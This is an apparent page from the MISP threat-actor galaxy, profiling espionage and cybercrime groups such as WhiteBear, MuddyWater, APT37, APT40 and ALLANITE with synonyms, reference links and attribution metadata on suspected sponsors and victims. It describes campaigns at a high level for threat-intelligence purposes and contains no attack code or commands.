As a part of our Kaspersky APT Intelligence Reporting subscription, customers received an update in mid-February 2017 on some interesting APT activity that we called WhiteBear. Much of the contents of that report are reproduced here. WhiteBear is a parallel project or second stage of the Skipper Turla cluster of activity documented in another private intelligence report “Skipper Turla – the White Atlas framework” from mid-2016. Like previous Turla activity, WhiteBear leverages compromised websites and hijacked satellite connections for command and control (C2) infrastructure. As a matter of fact, WhiteBear infrastructure has overlap with other Turla campaigns, like those deploying Kopiluwak, as documented in “KopiLuwak – A New JavaScript Payload from Turla” in December 2016. WhiteBear infected systems maintained a dropper (which was typically signed) as well as a complex malicious platform which was always preceded by WhiteAtlas module deployment attempts. However, despite the similarities to previous Turla campaigns, we believe that WhiteBear is a distinct project with a separate focus. We note that this observation of delineated target focus, tooling, and project context is an interesting one that also can be repeated across broadly labeled Turla and Sofacy activity. From February to September 2016, WhiteBear activity was narrowly focused on embassies and consular operations around the world. All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations. Continued WhiteBear activity later shifted to include defense-related organizations into June 2017. When compared to WhiteAtlas infections, WhiteBear deployments are relatively rare and represent a departure from the broader Skipper Turla target set. Additionally, a comparison of the WhiteAtlas framework to WhiteBear components indicates that the malware is the product of separate development efforts. 
WhiteBear infections appear to be preceded by a condensed spearphishing dropper, lack Firefox extension installer payloads, and contain several new components signed with a new code signing digital certificate, unlike WhiteAtlas incidents and modules.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular White Bear.
Known Synonyms |
---|
Skipper Turla |
Internal MISP references
UUID dc6c6cbc-9dc6-4ace-a2d2-fadefe45cce6
which can be used as unique global reference for White Bear
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Russian Federation |
cfr-suspected-victims | ['United States', 'South Korea', 'United Kingdom', 'Uzbekistan'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | RU |
PALE PANDA
Internal MISP references
UUID 43992f81-fd29-4228-94e0-c3aa3e65aab7
which can be used as unique global reference for PALE PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
Mana Team
Internal MISP references
UUID 110792e8-38d2-4df2-9ea3-08b60321e994
which can be used as unique global reference for Mana Team
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
Sowbug
Sowbug has been conducting highly targeted cyber attacks against organizations in South America and Southeast Asia and appears to be heavily focused on foreign policy institutions and diplomatic targets. Sowbug has been seen mounting classic espionage attacks by stealing documents from the organizations it infiltrates.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sowbug.
Known Synonyms |
---|
G0054 |
Internal MISP references
UUID 1ca3b039-404e-4132-88c2-4e41235cd2f5
which can be used as unique global reference for Sowbug
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Unknown |
cfr-suspected-victims | ['Argentina', 'Ecuador', 'Brazil', 'Brunei', 'Peru', 'Malaysia'] |
cfr-target-category | ['Government'] |
cfr-type-of-incident | Espionage |
Related clusters
MuddyWater
The MuddyWater attacks are primarily against Middle Eastern nations. However, we have also observed attacks against surrounding nations and beyond, including targets in India and the USA. MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call “POWERSTATS”. Despite broad scrutiny and reports on MuddyWater attacks, the activity continues with only incremental changes to the tools and techniques.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MuddyWater.
Known Synonyms |
---|
ATK51 |
Boggy Serpens |
COBALT ULSTER |
Earth Vetala |
G0069 |
MERCURY |
Mango Sandstorm |
Seedworm |
Static Kitten |
TA450 |
TEMP.Zagros |
Internal MISP references
UUID a29af069-03c3-4534-b78b-7d1a77ea085b
which can be used as unique global reference for MuddyWater
in MISP communities and other software using the MISP galaxy
External references
- https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/muddywater - webarchive
- https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/another-potential-muddywater-campaign-uses-powershell-based-prb-backdoor/ - webarchive
- https://securelist.com/muddywater/88059/ - webarchive
- https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group - webarchive
- https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf - webarchive
- https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/ - webarchive
- https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html - webarchive
- https://www.zdnet.com/article/new-leaks-of-iranian-cyber-espionage-operations-hit-telegram-and-the-dark-web/ - webarchive
- https://attack.mitre.org/groups/G0069/ - webarchive
- http://www.secureworks.com/research/threat-profiles/cobalt-ulster - webarchive
- https://unit42.paloaltonetworks.com/atoms/boggyserpens/ - webarchive
- https://www.sentinelone.com/blog/the-new-frontline-of-geopolitics-understanding-the-rise-of-state-sponsored-cyber-attacks/ - webarchive
- https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['Saudi Arabia', 'Georgia', 'Turkey', 'Iraq', 'Israel', 'India', 'United Arab Emirates', 'Pakistan', 'United States'] |
cfr-target-category | ['Government'] |
cfr-type-of-incident | Espionage |
country | IR |
Related clusters
MoneyTaker
In less than two years, this group has conducted over 20 successful attacks on financial institutions and legal firms in the USA, UK and Russia. The group has primarily been targeting card processing systems, including the AWS CBR (Russian Interbank System) and purportedly SWIFT (US). Given the wide usage of STAR in LATAM, financial institutions in LATAM could have particular exposure to a potential interest from the MoneyTaker group.
Internal MISP references
UUID 7d78ec00-dfdc-4a80-a4da-63f1ae63bd7f
which can be used as unique global reference for MoneyTaker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Dark Caracal
Lookout and Electronic Frontier Foundation (EFF) have discovered Dark Caracal, a persistent and prolific actor, who at the time of writing is believed to be administered out of a building belonging to the Lebanese General Security Directorate in Beirut. At present, we have knowledge of hundreds of gigabytes of exfiltrated data, in 21+ countries, across thousands of victims. Stolen data includes enterprise intellectual property and personally identifiable information.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dark Caracal.
Known Synonyms |
---|
G0070 |
Internal MISP references
UUID 3d449c83-4426-431a-b06a-cb4f8a0fca94
which can be used as unique global reference for Dark Caracal
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | LB |
Nexus Zeta
Nexus Zeta is no stranger when it comes to implementing SOAP related exploits. The threat actor has already been observed implementing two other known SOAP related exploits, CVE-2014-8361 and CVE-2017-17215, in his Satori botnet project. A third SOAP exploit, the TR-069 bug, has also been observed previously in IoT botnets. This makes EDB 38722 the fourth SOAP related exploit discovered in the wild in IoT botnets.
Internal MISP references
UUID 8c21ce09-33c3-412c-bb55-323765e89a60
which can be used as unique global reference for Nexus Zeta
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
APT37
APT37 has likely been active since at least 2012 and focuses on targeting the public and private sectors primarily in South Korea. In 2017, APT37 expanded its targeting beyond the Korean peninsula to include Japan, Vietnam and the Middle East, and to a wider range of industry verticals, including chemicals, electronics, manufacturing, aerospace, automotive and healthcare entities.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT37.
Known Synonyms |
---|
APT 37 |
ATK4 |
G0067 |
Group 123 |
Group123 |
InkySquid |
Moldy Pisces |
Operation Daybreak |
Operation Erebus |
Reaper |
Reaper Group |
Red Eyes |
Ricochet Chollima |
ScarCruft |
Venus 121 |
Internal MISP references
UUID 50cd027f-df14-40b2-aa22-bf5de5061163
which can be used as unique global reference for APT37
in MISP communities and other software using the MISP galaxy
External references
- https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/ - webarchive
- https://www.fireeye.com/blog/threat-research/2018/02/apt37-overlooked-north-korean-actor.html - webarchive
- https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf - webarchive
- http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html - webarchive
- https://twitter.com/mstoned7/status/966126706107953152 - webarchive
- https://www.cfr.org/interactive/cyber-operations/apt-37 - webarchive
- https://www.bleepingcomputer.com/news/security/report-ties-north-korean-attacks-to-new-malware-linked-by-word-macros/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-freemilk-highly-targeted-spear-phishing-campaign/ - webarchive
- https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html - webarchive
- https://attack.mitre.org/groups/G0067/ - webarchive
- https://securelist.com/cve-2016-4171-adobe-flash-zero-day-used-in-targeted-attacks/75082/ - webarchive
- https://securelist.com/operation-daybreak/75100/ - webarchive
- https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/ - webarchive
- https://threatpost.com/scarcruft-apt-group-used-latest-flash-zero-day-in-two-dozen-attacks/118642/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/moldypisces/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Korea (Democratic People's Republic of) |
cfr-suspected-victims | ['Republic of Korea', 'Japan', 'Vietnam'] |
cfr-target-category | ['Government', 'Private sector'] |
country | KP |
Related clusters
APT40
Leviathan is an espionage actor targeting organizations and high-value targets in defense and government. Active since at least 2014, this actor has long-standing interest in maritime industries, naval defense contractors, and associated research institutions in the United States and Western Europe.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT40.
Known Synonyms |
---|
ATK29 |
BRONZE MOHAWK |
G0065 |
GADOLINIUM |
Gingham Typhoon |
ISLANDDREAMS |
ITG09 |
KRYPTONITE PANDA |
Leviathan |
MUDCARP |
Red Ladon |
TA423 |
TEMP.Jumper |
TEMP.Periscope |
Internal MISP references
UUID 5b4b6980-3bc7-11e8-84d6-879aaac37dd9
which can be used as unique global reference for APT40
in MISP communities and other software using the MISP galaxy
External references
- https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets - webarchive
- https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html - webarchive
- https://www.cfr.org/interactive/cyber-operations/apt-40 - webarchive
- https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html - webarchive
- https://www.recordedfuture.com/chinese-threat-actor-tempperiscope/ - webarchive
- https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html - webarchive
- https://attack.mitre.org/groups/G0065/ - webarchive
- https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://intrusiontruth.wordpress.com/2020/01/09/what-is-the-hainan-xiandun-technology-development-company - webarchive
- https://intrusiontruth.wordpress.com/2020/01/10/who-is-mr-gu - webarchive
- https://intrusiontruth.wordpress.com/2020/01/13/who-else-works-for-this-cover-company-network - webarchive
- https://intrusiontruth.wordpress.com/2020/01/14/who-is-mr-ding - webarchive
- https://intrusiontruth.wordpress.com/2020/01/15/hainan-xiandun-technology-company-is-apt40 - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-mohawk - webarchive
- https://www.mycert.org.my/portal/advisory?id=MA-774.022020 - webarchive
- https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign - webarchive
- https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/ - webarchive
- https://www.justice.gov/opa/pr/four-chinese-nationals-working-ministry-state-security-charged-global-computer-intrusion - webarchive
- https://www.justice.gov/opa/press-release/file/1412916/download - webarchive
- https://www.justice.gov/opa/press-release/file/1412921/download - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa21-200a - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa21-200b - webarchive
- https://www.canada.ca/en/global-affairs/news/2021/07/statement-on-chinas-cyber-campaigns.html - webarchive
- https://www.ncsc.gov.uk/news/uk-allies-hold-chinese-state-responsible-for-pervasive-pattern-of-hacking - webarchive
- https://www.gov.uk/government/news/uk-and-allies-hold-chinese-state-responsible-for-a-pervasive-pattern-of-hacking - webarchive
- https://www.rnz.co.nz/news/political/447239/government-points-finger-at-china-over-cyber-attacks - webarchive
- https://www.foreignminister.gov.au/minister/marise-payne/media-release/australia-joins-international-partners-attribution-malicious-cyber-activity-china - webarchive
- https://www.mofa.go.jp/press/danwa/press6e_000312.html - webarchive
- https://www.consilium.europa.eu/en/press/press-releases/2021/07/19/declaration-by-the-high-representative-on-behalf-of-the-eu-urging-china-to-take-action-against-malicious-cyber-activities-undertaken-from-its-territory - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi - webarchive
- https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea - webarchive
- https://www.accenture.com/_acnmedia/pdf-96/accenture-security-mudcarp.pdf - webarchive
- https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States', 'Hong Kong', 'The Philippines', 'Asia Pacific Economic Cooperation', 'Cambodia', 'Belgium', 'Germany', 'Philippines', 'Malaysia', 'Norway', 'Saudi Arabia', 'Switzerland', 'United Kingdom'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | CN |
Related clusters
APT35
FireEye has identified APT35 operations dating back to 2014. APT35, also known as the Newscaster Team, is a threat group sponsored by the Iranian government that conducts long-term, resource-intensive operations to collect strategic intelligence. APT35 typically targets U.S. and Middle Eastern military, diplomatic and government personnel, organizations in the media, energy and defense industrial base (DIB), and engineering, business services and telecommunications sectors.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT35.
Known Synonyms |
---|
COBALT MIRAGE |
G0059 |
Magic Hound |
Mint Sandstorm |
Newscaster Team |
Phosphorus |
TunnelVision |
Internal MISP references
UUID b8967b3c-3bc9-11e8-8701-8b1ead8c099e
which can be used as unique global reference for APT35
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf - webarchive
- https://attack.mitre.org/groups/G0059/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/magic-hound - webarchive
- https://unit42.paloaltonetworks.com/unit42-magic-hound-campaign-attacks-saudi-targets/ - webarchive
- https://securityaffairs.co/wordpress/56348/intelligence/magic-hound-campaign.html - webarchive
- https://www.cfr.org/cyber-operations/apt-35 - webarchive
- https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/ - webarchive
- https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/ - webarchive
- https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/ - webarchive
- https://www.secureworks.com/blog/cobalt-mirage-conducts-ransomware-operations-in-us - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | IR |
Orangeworm
Symantec has identified a previously unknown group called Orangeworm that has been observed installing a custom backdoor called Trojan.Kwampirs within large international corporations operating in the healthcare sector in the United States, Europe, and Asia. First identified in January 2015, Orangeworm has also conducted targeted attacks against organizations in related industries as part of a larger supply-chain attack in order to reach its intended victims. Known victims include healthcare providers, pharmaceutical companies, IT solution providers for healthcare, and equipment manufacturers that serve the healthcare industry, likely for the purpose of corporate espionage.
Internal MISP references
UUID 35d71626-4794-11e8-b74d-bbcbe48fee3c
which can be used as unique global reference for Orangeworm
in MISP communities and other software using the MISP galaxy
ALLANITE
Adversaries abusing ICS (based on Dragos Inc adversary list). ALLANITE accesses business and industrial control (ICS) networks, conducts reconnaissance, and gathers intelligence in United States and United Kingdom electric utility sectors. Dragos assesses with moderate confidence that ALLANITE operators continue to maintain ICS network access to: (1) understand the operational environment necessary to develop disruptive capabilities, (2) have ready access from which to disrupt electric utilities. ALLANITE uses email phishing campaigns and compromised websites called watering holes to steal credentials and gain access to target networks, including collecting and distributing screenshots of industrial control systems. ALLANITE operations limit themselves to information gathering and have not demonstrated any disruptive or damaging capabilities. ALLANITE conducts malware-less operations primarily leveraging legitimate and available tools in the Windows operating system.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ALLANITE.
Known Synonyms |
---|
Allanite |
Palmetto Fusion |
Internal MISP references
UUID a9000eaf-2b75-4ec7-8dcf-fe1bb5c77470
which can be used as unique global reference for ALLANITE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
capabilities | Powershell scripts, THC Hydra, SecretsDump, Inveigh, PSExec |
mode-of-operation | Watering-hole and phishing leading to ICS recon and screenshot collection |
since | 2017 |
victimology | Electric utilities, US and UK |
CHRYSENE
Adversaries abusing ICS (based on Dragos Inc adversary list). This threat actor targets organizations involved in oil, gas, and electricity production, primarily in the Gulf region, for espionage purposes. According to one cybersecurity company, the threat actor “compromises a target machine and passes it off to another threat actor for further exploitation.”
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CHRYSENE.
Known Synonyms |
---|
Greenbug |
OilRig |
Internal MISP references
UUID a0082cfa-32e2-42b8-92d8-5c7a7409dcf1
which can be used as unique global reference for CHRYSENE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
capabilities | Watering holes, 64-bit malware, covert C2 via IPv6 DNS, ISMDOOR |
cfr-suspected-state-sponsor | Unknown |
cfr-suspected-victims | ['Iraq', 'United Kingdom', 'Pakistan', 'Israel'] |
cfr-target-category | ['Private sector'] |
cfr-type-of-incident | Espionage |
mode-of-operation | IT compromise, information gathering and recon against industrial orgs |
since | 2017 |
victimology | Oil and Gas, Manufacturing, Europe, MENA, North America |
ZooPark
ZooPark is a cyberespionage operation that has been focusing on Middle Eastern targets since at least June 2015. The threat actors behind ZooPark infect Android devices using several generations of malware, labelled v1 to v4, with v4 being the most recent version, deployed in 2017.
Internal MISP references
UUID 4defbf2e-4f73-11e8-807f-578d61da7568
which can be used as unique global reference for ZooPark
in MISP communities and other software using the MISP galaxy
RANCOR
The Rancor group’s attacks use two primary malware families, named DDKONG and PLAINTEE. DDKONG is used throughout the campaign, while PLAINTEE appears to be a new addition to these attackers’ toolkit. Countries Unit 42 has identified as targeted by Rancor with these malware families include, but are not limited to, Singapore and Cambodia.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RANCOR.
Known Synonyms |
---|
G0075 |
Rancor |
Rancor Group |
Rancor Taurus |
Rancor group |
Internal MISP references
UUID 79c7c7e0-79d5-11e8-9b9c-1ff96be20c0b
which can be used as unique global reference for RANCOR
in MISP communities and other software using the MISP galaxy
External references
- https://unit42.paloaltonetworks.com/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/rancor - webarchive
- https://attack.mitre.org/groups/G0075/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/rancortaurus/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Singapore', 'Cambodia'] |
cfr-target-category | ['Government', 'Civil society'] |
cfr-type-of-incident | Espionage |
country | CN |
The Big Bang
While it is not clear exactly what the attacker is looking for, what is clear is that once he finds it, a second stage of the attack awaits, fetching additional modules and/or malware from the Command and Control server. This then is a surveillance attack in progress and has been dubbed ‘Big Bang’ due to the attacker’s fondness for the ‘Big Bang Theory’ TV show, after which some of the malware’s modules are named.
Internal MISP references
UUID a3cc5105-3bc6-498b-8d53-981e12d86909
which can be used as unique global reference for The Big Bang
in MISP communities and other software using the MISP galaxy
The Gorgon Group
Unit 42 researchers have been tracking Subaat, an attacker, since 2017. Recently Subaat drew our attention due to renewed targeted attack activity. Part of monitoring Subaat included realizing that the actor was possibly part of a larger crew of individuals responsible for carrying out targeted attacks against governmental organizations worldwide. Technical analysis of some of the attacks, as well as attribution links to Pakistani actors, has already been described by 360 and Tuisec, who found interesting connections to a larger group of attackers Unit 42 researchers have been tracking, which we are calling Gorgon Group.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular The Gorgon Group.
Known Synonyms |
---|
ATK92 |
G0078 |
Gorgon Group |
Pasty Gemini |
Subaat |
Internal MISP references
UUID e47c2c4d-706b-4098-92a2-b93e7103e131
which can be used as unique global reference for The Gorgon Group
in MISP communities and other software using the MISP galaxy
External references
- https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-tracking-subaat-targeted-phishing-attacks-point-leader-threat-actors-repository/ - webarchive
- https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/ - webarchive
- https://attack.mitre.org/groups/G0078/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/pastygemini/ - webarchive
DarkHydrus
In July 2018, Unit 42 analyzed a targeted attack using a novel file type against at least one government agency in the Middle East. It was carried out by a previously unpublished threat group we track as DarkHydrus. Based on our telemetry, we were able to uncover additional artifacts leading us to believe this adversary group has been in operation with their current playbook since early 2016. This attack diverged from previous attacks we observed from this group as it involved spear-phishing emails sent to targeted organizations with password protected RAR archive attachments that contained malicious Excel Web Query files (.iqy).
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DarkHydrus.
Known Synonyms |
---|
G0079 |
LazyMeerkat |
Obscure Serpens |
Internal MISP references
UUID ce2c2dfd-2445-4fbc-a747-9e7092e383f9
which can be used as unique global reference for DarkHydrus
in MISP communities and other software using the MISP galaxy
External references
- https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/ - webarchive
- https://mobile.twitter.com/360TIC/status/1083289987339042817 - webarchive
- https://ti.360.net/blog/articles/latest-target-attack-of-darkhydruns-group-against-middle-east-en/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-darkhydrus-uses-phishery-harvest-credentials-middle-east/ - webarchive
- https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/ - webarchive
- https://attack.mitre.org/groups/G0079/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/obscureserpens/ - webarchive
RedAlpha
Recorded Future’s Insikt Group has identified two new cyberespionage campaigns targeting the Tibetan Community over the past two years. The campaigns, which we are collectively naming RedAlpha, combine light reconnaissance, selective targeting, and diverse malicious tooling. We discovered this activity as the result of pivoting off of a new malware sample observed targeting the Tibetan community based in India.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RedAlpha.
Known Synonyms |
---|
DeepCliff |
Red Dev 3 |
Internal MISP references
UUID 71a3b962-9a36-11e8-88f8-b31d20c6fa2a
which can be used as unique global reference for RedAlpha
in MISP communities and other software using the MISP galaxy
External references
- https://www.recordedfuture.com/chinese-cyberespionage-operations - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2018-0626.pdf - webarchive
- https://go.recordedfuture.com/hubfs/reports/ta-2022-0816.pdf - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
TempTick
This threat actor targets organizations in the finance, defense, aerospace, technology, health-care, and automotive sectors and media organizations in East Asia for the purpose of espionage. It is believed to be responsible for the targeting of South Korean actors prior to the meeting of Donald J. Trump and Kim Jong-un.
Internal MISP references
UUID 3f3ff6de-a6a7-11e8-92b4-3743eb1c7762
which can be used as unique global reference for TempTick
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['South Korea', 'Japan'] |
cfr-target-category | ['Government', 'Private sector'] |
country | CN |
Operation Parliament
This threat actor uses spear-phishing techniques to target parliaments, government ministries, academics, and media organizations, primarily in the Middle East, for the purpose of espionage. Based on our findings, we believe the attackers represent a previously unknown, geopolitically motivated threat actor. The campaign started in 2017, with the attackers doing just enough to achieve their goals. They most likely have access to additional tools when needed and appear to have access to an elaborate database of contacts in sensitive organizations and personnel worldwide, especially vulnerable and untrained staff. The victim systems range from personal desktop or laptop systems to large servers with domain controller or similar roles. The nature of the targeted ministries varied, including those responsible for telecommunications, health, energy, justice, finance and so on. Operation Parliament appears to be another symptom of escalating tensions in the Middle East region. The attackers have taken great care to stay under the radar, imitating another attack group in the region. They have been particularly careful to verify victim devices before proceeding with the infection, safeguarding their command and control servers. The targeting seems to have slowed down since the beginning of 2018, probably winding down once the desired data or access was obtained. The targeting of specific victims is unlike previously seen behavior in regional campaigns by Gaza Cybergang or Desert Falcons and points to an elaborate information-gathering exercise (physical and/or digital) carried out before the attacks. With deception and false flags increasingly being employed by threat actors, attribution is a hard and complicated task that requires solid evidence, especially in complex regions such as the Middle East.
Internal MISP references
UUID e20e8eb8-a6b4-11e8-8a92-6ba6e7540c6d
which can be used as unique global reference for Operation Parliament
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Unknown |
cfr-suspected-victims | ['Palestine', 'United Arab Emirates', 'Qatar', 'Somalia', 'Syria', 'Canada', 'Germany', 'Serbia', 'Kuwait', 'Egypt', 'Saudi Arabia', 'Chile', 'Iraq', 'India', 'United States', 'Israel', 'Russia', 'South Korea', 'Jordan', 'Djibouti', 'Lebonon', 'Morocco', 'Iran', 'United Kingdom', 'Afghanistan', 'Oman', 'Denmark'] |
cfr-target-category | ['Government', 'Civil society'] |
cfr-type-of-incident | Espionage |
Inception Framework
This threat actor uses spear-phishing techniques to target private-sector energy, defense, aerospace, research, and media organizations and embassies in Africa, Europe, and the Middle East, for the purpose of espionage.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Inception Framework.
Known Synonyms |
---|
ATK116 |
Blue Odin |
Clean Ursa |
Cloud Atlas |
G0100 |
OXYGEN |
Internal MISP references
UUID 71ef51ca-a791-11e8-a026-07980ca910ca
which can be used as unique global reference for Inception Framework
in MISP communities and other software using the MISP galaxy
External references
- https://www.cfr.org/interactive/cyber-operations/inception-framework - webarchive
- https://web.archive.org/web/20160710180729/https://www.bluecoat.com/security-blog/2014-12-09/blue-coat-exposes-%E2%80%9C-inception-framework%E2%80%9D-very-sophisticated-layered-malware - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Inception_APT_Analysis_Bluecoat.pdf - webarchive
- https://logrhythm.com/blog/catching-the-inception-framework-phishing-attack - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/bcs_wp_InceptionReport_EN_v12914.pdf - webarchive
- https://securelist.com/the-red-october-campaign/57647 - webarchive
- https://securelist.com/red-october-diplomatic-cyber-attacks-investigation/36740 - webarchive
- https://securelist.com/red-october-part-two-the-modules/57645 - webarchive
- https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083 - webarchive
- https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899 - webarchive
- https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability - webarchive
- https://securelist.com/recent-cloud-atlas-activity/92016 - webarchive
- https://www.symantec.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies - webarchive
- https://www.akamai.com/uk/en/multimedia/documents/white-paper/upnproxy-blackhat-proxies-via-nat-injections-white-paper.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://unit42.paloaltonetworks.com/atoms/clean-ursa - webarchive
- https://www.cfr.org/interactive/cyber-operations/cloud-atlas - webarchive
- https://www.cfr.org/cyber-operations/red-october - webarchive
- https://attack.mitre.org/groups/G0100 - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Russian Federation |
